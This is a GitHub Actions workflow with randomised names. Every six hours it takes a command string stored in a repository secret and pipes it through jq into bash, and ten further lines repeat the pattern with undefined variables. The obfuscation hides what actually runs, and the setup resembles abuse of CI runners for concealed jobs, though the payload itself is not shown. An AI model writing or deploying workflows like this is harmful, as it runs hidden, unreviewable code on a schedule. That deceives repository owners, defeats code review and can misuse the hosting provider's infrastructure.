name: membershipthorns
on:
  workflow_dispatch:
  schedule:
    - cron: '18 4/6 * * *'

jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: membershipthorns
        env:
          l0025: ${{ secrets.l0025 }}
        run: |
          echo $l0025 | jq -r .v09 | /bin/bash
          echo $z91120 | jq -r .taj0342 | /bin/bash
          echo $uhk6336 | jq -r .tyrny10156 | /bin/bash
          echo $dxa579 | jq -r .tzgog02 | /bin/bash
          echo $lg0 | jq -r .mnu9311 | /bin/bash
          echo $itpg1 | jq -r .sfd25 | /bin/bash
          echo $aodbb235 | jq -r .i50 | /bin/bash
          echo $is22 | jq -r .aoc361 | /bin/bash
          echo $slg6 | jq -r .obte08724 | /bin/bash
          echo $jit522 | jq -r .xf101 | /bin/bash
          echo $gxzy6406 | jq -r .k0 | /bin/bash

